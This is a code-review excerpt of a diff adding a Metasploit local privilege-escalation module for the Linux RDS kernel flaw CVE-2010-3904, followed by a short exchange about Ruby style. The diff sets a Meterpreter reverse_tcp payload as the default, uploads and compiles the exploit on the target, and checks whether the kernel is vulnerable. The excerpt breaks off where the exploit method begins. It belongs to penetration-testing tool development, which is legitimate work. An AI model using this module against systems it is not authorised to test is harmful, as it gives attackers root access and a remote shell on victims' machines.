modules/exploits/linux/local/rds_priv_esc.rb

```diff
@@ -0,0 +1,187 @@
+          [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],
+        ],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp',
+          'WfsDelay'    => 10,
+          'PrependFork' => true
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def modules_disabled?
+    modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip
+    (modules_disabled.eql?('1') || modules_disabled.eql?('2'))
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+    output = cmd_exec "gcc -o #{path} #{path}.c"
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    cmd_exec "chmod +x #{path}"
+    register_file_for_cleanup path
+  end
+
+  def exploit_data(file)
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file
+    fd = ::File.open path, 'rb'
+    data = fd.read fd.stat.size
+    fd.close
+    data
+  end
+
+  def live_compile?
+    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+
+    if has_gcc?
+      vprint_good 'gcc is installed'
+      return true
+    end
+
+    unless datastore['COMPILE'].eql? 'Auto'
+      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+    end
+  end
+
+  def check
+    version = kernel_release
+    unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&
+           Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')
+      vprint_error "Linux kernel version #{version} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "Linux kernel version #{version} appears to be vulnerable"
+
+    unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
+      vprint_error 'RDS kernel module is not available'
+      return CheckCode::Safe
+    end
+    vprint_good 'RDS kernel module is available'
+
+    if modules_disabled?
+      unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'
+        vprint_error 'RDS kernel module is not loadable'
+        return CheckCode::Safe
+      end
+    end
+    vprint_good 'RDS kernel module is loadable'
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    if check != CheckCode::Appears
```

Comment:
So I hate `unless` as much as the next non-ruby dev, but you used it on line 115.  Just an inconsistent nitpicky thing I noticed.

Reply:
`unless` was copypasta from another module